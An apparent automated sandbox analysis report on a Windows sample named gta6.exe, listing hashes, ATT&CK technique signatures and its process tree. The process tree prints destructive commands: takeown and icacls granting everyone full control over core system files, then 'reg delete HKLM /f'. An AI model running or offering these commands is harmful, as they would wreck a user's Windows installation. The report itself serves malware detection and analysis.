Analysis

  • max time kernel
    130s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-10-2024 17:41

General

  • Target

    gta6.exe

  • Size

    55KB

  • MD5

    aaff8d22681e8bdee3c3ba55007f673f

  • SHA1

    aa94b52ee5290629165387bb0e7bdf3600e7a073

  • SHA256

    512b5deba1f1990f43876c48e0d8767f102cb7a0a949c6c9c6e079676bcd72eb

  • SHA512

    7e097d80b931aaa992b47f76c01eaa7e13c95fcc9d62d0b899216e0309563f32a6b0cb609e4540d81f8a4d3590f7fa277c124d2d6430f9409cf8f5c43f15792a

  • SSDEEP

    1536:T4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNs2:T4dzVTaer344JzthRZijQ1Js

Malware Config

Signatures

  • Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 2 IoCs
  • Modifies firewall policy service 3 TTPs 36 IoCs
  • Modifies security service 2 TTPs 18 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 52 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Boot or Logon Autostart Execution: Port Monitors 1 TTPs 12 IoCs

    Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation.

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 42 IoCs
  • Manipulates Digital Signatures 1 TTPs 64 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Possible privilege escalation attempt 20 IoCs
  • Boot or Logon Autostart Execution: Print Processors 1 TTPs 4 IoCs

    Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
  • Modifies file permissions 1 TTPs 20 IoCs
  • Modifies system executable filetype association 2 TTPs 45 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 42 IoCs

    remove IFEO.

  • Installs/modifies Browser Helper Object 2 TTPs 9 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Maps connected drives based on registry 3 TTPs 3 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\gta6.exe
    "C:\Users\Admin\AppData\Local\Temp\gta6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC0F.tmp\BC10.tmp\BC11.bat C:\Users\Admin\AppData\Local\Temp\gta6.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Windows\system32\fsutil.exe
        fsutil dirty query C:
        3⤵
          PID:2256
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\hal.dll /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2692
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\hal.dll /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1248
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winload.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2192
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winload.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2196
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winresume.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2392
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2408
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winlogon.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2688
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2920
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\wininit.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2432
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2240
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2836
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2860
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\regedit.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2832
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2856
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\taskmgr.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2828
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2764
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\consent.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2732
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\consent.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2936
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\drivers /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2816
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\drivers /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2880
        • C:\Windows\System32\reg.exe
          reg delete HKLM /f
          3⤵
          • Adds autorun key to be loaded by Explorer.exe on startup
          • Modifies firewall policy service
          • Modifies security service
          • Boot or Logon Autostart Execution: Active Setup
          • Boot or Logon Autostart Execution: Port Monitors
          • Event Triggered Execution: Image File Execution Options Injection
          • Manipulates Digital Signatures
          • Boot or Logon Autostart Execution: Print Processors
          • Impair Defenses: Safe Mode Boot
          • Modifies system executable filetype association
          • Adds Run key to start application
          • Indicator Removal: Clear Persistence
          • Installs/modifies Browser Helper Object
          • Maps connected drives based on registry
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Enumerates system info in registry
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Modifies registry key
          PID:2708

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\BC0F.tmp\BC10.tmp\BC11.bat

      Filesize

      2KB

      MD5

      786dba0c5b6539cf40382e1d6a31941e

      SHA1

      23dd0dfdbb1a2584744979a146346726b9577d9c

      SHA256

      0d539203223fb2a353189c36748edbad1c33ade0158f72c3ca4b14dec0aafcdb

      SHA512

      7ea197c07aeb76b22fcf813d779a708680d98dc68e0117c46d637d88952ef686a87e329fcec21b8d0d43860f3481611bfab104e7390906486882890d57d3e4c3

    • memory/2136-0-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/2136-4-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/2136-5-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB